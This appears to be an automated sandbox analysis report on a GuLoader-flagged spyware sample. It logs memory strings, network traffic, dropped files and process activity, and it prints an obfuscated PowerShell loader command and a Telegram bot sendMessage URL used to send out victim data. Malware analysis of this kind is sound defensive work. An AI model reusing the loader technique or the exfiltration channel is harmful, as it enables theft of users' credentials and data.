            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20a
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000002.00000002.2207916280.0000000004EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2210698080.0000000005DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022EC1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E55000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2695880589.0000000022E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: wabmig.exe, 00000007.00000002.2695880589.0000000022FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\SysWOW64\sennepssovsenJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406DC60_2_00406DC6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040759D0_2_0040759D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C0EBD82_2_04C0EBD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C0F4A82_2_04C0F4A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C0E8902_2_04C0E890
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0775C80E2_2_0775C80E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094C1477_2_0094C147
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094D2787_2_0094D278
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094C7387_2_0094C738
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094E9887_2_0094E988
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_009469A07_2_009469A0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094CA087_2_0094CA08
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094CCD87_2_0094CCD8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00943E137_2_00943E13
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094CFA97_2_0094CFA9
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00946FC87_2_00946FC8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_009453707_2_00945370
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094F6317_2_0094F631
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094E97B7_2_0094E97B
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00943A917_2_00943A91
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094FA8D7_2_0094FA8D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D495487_2_25D49548
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D429687_2_25D42968
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D49C187_2_25D49C18
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D450287_2_25D45028
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D417A07_2_25D417A0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D40B307_2_25D40B30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D41E807_2_25D41E80
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4DDFF7_2_25D4DDFF
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4D9997_2_25D4D999
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4D9A87_2_25D4D9A8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4D5507_2_25D4D550
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4295A7_2_25D4295A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4D5457_2_25D4D545
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4D0F87_2_25D4D0F8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4CC8F7_2_25D4CC8F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4CCA07_2_25D4CCA0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D400407_2_25D40040
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4FC687_2_25D4FC68
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4F8107_2_25D4F810
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D450187_2_25D45018
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4F8017_2_25D4F801
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4003B7_2_25D4003B
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D48B907_2_25D48B90
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4178F7_2_25D4178F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4F3B87_2_25D4F3B8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D48BA07_2_25D48BA0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4F3A87_2_25D4F3A8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4EF517_2_25D4EF51
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4EF607_2_25D4EF60
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4EB087_2_25D4EB08
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D40B2F7_2_25D40B2F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4E6B07_2_25D4E6B0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4E6AF7_2_25D4E6AF
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4E2587_2_25D4E258
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4E2497_2_25D4E249
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D41E707_2_25D41E70
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_25D4DE007_2_25D4DE00
            Source: file.exeStatic PE information: invalid certificate
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@3/4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\acneformJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nskB008.tmpJump to behavior
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2216409652.0000000008695000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.000000000750D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2216409652.000000000864F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2212699188.00000000074F1000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
